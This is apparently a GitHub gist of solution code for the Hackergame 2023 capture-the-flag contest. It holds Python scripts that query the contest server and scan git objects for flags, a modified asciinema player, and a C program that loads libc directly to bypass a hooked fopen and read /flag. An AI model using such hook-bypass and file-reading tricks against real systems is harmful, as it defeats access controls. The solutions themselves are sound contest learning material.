Created
November 4, 2023 09:48
-
-
Save vifly/406b6ad86a4f725b14a6494dff1755c3 to your computer and use it in GitHub Desktop.
Hackergame 2023 writeup code
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
cookies = {"session": ""} | |
SESS = requests.session() | |
def crack(): | |
data = {"x": "1", "y": "1"} | |
r = SESS.post("http://202.38.93.111:10077/", cookies=cookies, json=data) | |
print(r.json()) | |
data = {"x": "0", "y": "0"} | |
r = SESS.post("http://202.38.93.111:10077/", cookies=cookies, json=data) | |
print(r.json()) | |
data = {"x": "2", "y": "2"} | |
r = SESS.post("http://202.38.93.111:10077/", cookies=cookies, json=data) | |
print(r.json()) | |
crack() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import zlib | |
import glob | |
import os | |
def get_files_path(dir_path: str) -> list[str]: | |
result = [] | |
result = list(glob.glob(os.path.join(dir_path, "**/*"), recursive=True)) | |
result = [i for i in result if os.path.isfile(i)] | |
return result | |
obj_dir = "ML-Course-Notes/.git/objects" | |
for f_path in get_files_path(obj_dir): | |
if "pack" not in f_path: | |
with open(f_path, "rb") as f: | |
decompressed_contents = zlib.decompress(f.read()) | |
if "flag" in str(decompressed_contents): | |
print(decompressed_contents) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
import time | |
cookies = {"session": ""} | |
SESS = requests.session() | |
def is_need_delete(text: str) -> bool: | |
if "hack[" in text: | |
return True | |
return False | |
def crack(): | |
r = SESS.post("http://202.38.93.111:10021/api/getMessages", cookies=cookies) | |
msg_list = r.json()["messages"] | |
start_time = time.time() | |
for index, msg in enumerate(msg_list): | |
now_time = time.time() | |
if (now_time - start_time) < msg["delay"]: | |
time.sleep(msg["delay"] - (now_time - start_time)) | |
if is_need_delete(msg["text"]): | |
r = SESS.post( | |
"http://202.38.93.111:10021/api/deleteMessage", | |
json={"id": index}, | |
cookies=cookies, | |
) | |
print(r.json()) | |
r = SESS.post("http://202.38.93.111:10021/api/getflag", cookies=cookies) | |
print(r.json()) | |
crack() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# modify from https://github.com/asciinema/asciinema/blob/2c8af028dec448bb51ec0a1848e96a08121827b0/asciinema/player.py | |
import json | |
import sys | |
import time | |
from typing import Any, Dict, Optional, TextIO, Union | |
from .asciicast import events as ev | |
from .asciicast.v1 import Asciicast as v1 | |
from .asciicast.v2 import Asciicast as v2 | |
from .tty_ import raw, read_blocking | |
import string | |
Header = Dict[str, Any] | |
def clean_data(data: str) -> str: | |
return ''.join([str(char) for char in data if char in string.printable]).replace("[KESC", "").replace(":[K", "").replace("\\u001b", "").replace("\\b", "").replace("[K", "").replace("~~", "") | |
class RawOutput: | |
def __init__(self, stream: Optional[str]) -> None: | |
self.stream = stream or "o" | |
def start(self, _header: Header) -> None: | |
pass | |
def write(self, _time: float, event_type: str, data: str) -> None: | |
if event_type == self.stream: | |
with open("./rec.js", 'a') as f: | |
f.write(clean_data(data)) | |
class AsciicastOutput: | |
def __init__(self, stream: Optional[str]) -> None: | |
self.stream = stream | |
def start(self, header: Header) -> None: | |
self.__write_line(header) | |
def write(self, time: float, event_type: str, data: str) -> None: | |
if self.stream in [None, event_type]: | |
self.__write_line([time, event_type, data]) | |
def __write_line(self, obj: Any) -> None: | |
line = json.dumps( | |
obj, ensure_ascii=False, indent=None, separators=(", ", ": ") | |
) | |
sys.stdout.write(f"{line}\r\n") | |
sys.stdout.flush() | |
Output = Union[RawOutput, AsciicastOutput] | |
class Player: # pylint: disable=too-few-public-methods | |
def play( | |
self, | |
asciicast: Union[v1, v2], | |
idle_time_limit: Optional[int] = None, | |
speed: float = 1.0, | |
key_bindings: Optional[Dict[str, Any]] = None, | |
out_fmt: str = "raw", | |
stream: Optional[str] = None, | |
pause_on_markers: bool = False, | |
) -> None: | |
if key_bindings is None: | |
key_bindings = {} | |
output: Output = ( | |
RawOutput(stream) if out_fmt == "raw" else AsciicastOutput(stream) | |
) | |
try: | |
with open("/dev/tty", "rt", encoding="utf-8") as stdin: | |
with raw(stdin.fileno()): | |
self._play( | |
asciicast, | |
idle_time_limit, | |
speed, | |
stdin, | |
key_bindings, | |
output, | |
pause_on_markers, | |
) | |
except IOError: | |
self._play( | |
asciicast, | |
idle_time_limit, | |
speed, | |
None, | |
key_bindings, | |
output, | |
False, | |
) | |
@staticmethod | |
def _play( # pylint: disable=too-many-locals | |
asciicast: Union[v1, v2], | |
idle_time_limit: Optional[int], | |
speed: float, | |
stdin: Optional[TextIO], | |
key_bindings: Dict[str, Any], | |
output: Output, | |
pause_on_markers: bool, | |
) -> None: | |
idle_time_limit = idle_time_limit or asciicast.idle_time_limit | |
pause_key = key_bindings.get("pause") | |
step_key = key_bindings.get("step") | |
next_marker_key = key_bindings.get("next_marker") | |
events = asciicast.events() | |
events = ev.to_relative_time(events) | |
events = ev.cap_relative_time(events, idle_time_limit) | |
events = ev.to_absolute_time(events) | |
events = ev.adjust_speed(events, speed) | |
output.start(asciicast.v2_header) | |
ctrl_c = False | |
pause_elapsed_time: Optional[float] = None | |
events_iter = iter(events) | |
start_time = time.perf_counter() | |
def wait(timeout: int) -> bytes: | |
if stdin is not None: | |
return read_blocking(stdin.fileno(), timeout) | |
return b"" | |
def next_event() -> Any: | |
try: | |
return events_iter.__next__() | |
except StopIteration: | |
return (None, None, None) | |
time_, event_type, text = next_event() | |
while time_ is not None and not ctrl_c: | |
if pause_elapsed_time: | |
while time_ is not None: | |
key = wait(1000) | |
if 0x03 in key: # ctrl-c | |
ctrl_c = True | |
break | |
if key == pause_key: | |
assert pause_elapsed_time is not None | |
start_time = time.perf_counter() - pause_elapsed_time | |
pause_elapsed_time = None | |
break | |
if key == step_key: | |
pause_elapsed_time = time_ | |
output.write(time_, event_type, text) | |
time_, event_type, text = next_event() | |
elif key == next_marker_key: | |
while time_ is not None and event_type != "m": | |
output.write(time_, event_type, text) | |
time_, event_type, text = next_event() | |
if time_ is not None: | |
output.write(time_, event_type, text) | |
pause_elapsed_time = time_ | |
time_, event_type, text = next_event() | |
else: | |
while time_ is not None: | |
elapsed_wall_time = time.perf_counter() - start_time | |
delay = time_ - elapsed_wall_time | |
key = b"" | |
# if delay > 0: | |
# key = wait(delay) | |
if 0x03 in key: # ctrl-c | |
ctrl_c = True | |
break | |
elif key == pause_key: | |
pause_elapsed_time = time.perf_counter() - start_time | |
break | |
else: | |
output.write(time_, event_type, text) | |
if event_type == "m" and pause_on_markers: | |
pause_elapsed_time = time_ | |
time_, event_type, text = next_event() | |
break | |
time_, event_type, text = next_event() | |
if ctrl_c: | |
raise KeyboardInterrupt() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <dlfcn.h> | |
#include <stdio.h> | |
typedef FILE *(*fopen_func)(const char *restrict pathname, | |
const char *restrict mode); | |
int main(const int argc, const char *argv[]) { | |
char ch; | |
void *real_lib = dlopen("/lib/x86_64-linux-gnu/libc.so.6", RTLD_NOW); | |
fopen_func real_fopen = dlsym(real_lib, "fopen"); | |
FILE *fp = real_fopen("/flag", "r"); | |
while (!feof(fp)) { | |
ch = fgetc(fp); | |
if (33 <= ch && ch <= 126) { | |
printf("%c", ch); | |
} | |
} | |
fclose(fp); | |
int res = dlclose(real_lib); | |
return 0; | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python3 | |
# Th siz of th fil may reduc after XZRJification | |
def check_equals(left, right): | |
# check whether left == right or not | |
if left != right: exit(1) | |
def get_cod_dict(): | |
# prepar th cod dict | |
cod_dict = [] | |
cod_dict += ['nymeh1niwemflcir}echaet '] # 未知,用空格填充到 24 个字符 | |
cod_dict += ['a3g7}kidgojernoetl sup?h'] # 空格后面待定 | |
cod_dict += ['ulw!ff5soadrhwnrsnstnoeq'] # done | |
cod_dict += ['ct {l-findiehaai{oveatas'] # 空格前面待定 | |
cod_dict += ['ty9kxborszst guyd?!blm-p'] # g 之前删了一位 | |
check_equals(set(len(s) for s in cod_dict), {24}) | |
return ''.join(cod_dict) | |
def decrypt_data(input_codes): | |
# retriev th decrypted data | |
cod_dict = get_cod_dict() | |
output_chars = [cod_dict[c] for c in input_codes] | |
return ''.join(output_chars) | |
if __name__ == '__main__': | |
# check som obvious things | |
# check_equals('creat', 'cr' + 'at') | |
# check_equals('referer', 'refer' + 'rer') | |
# check th flag | |
flag = decrypt_data([53, 41, 85, 109, 75, 1, 33, 48, 77, 90, | |
17, 118, 36, 25, 13, 89, 90, 3, 63, 25, | |
31, 77, 27, 60, 3, 118, 24, 62, 54, 61, | |
25, 63, 77, 36, 5, 32, 60, 67, 113, 28]) | |
check_equals(flag.index('flag{'), 0) | |
check_equals(flag.index('}'), len(flag) - 1) | |
# print th flag | |
print(flag) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment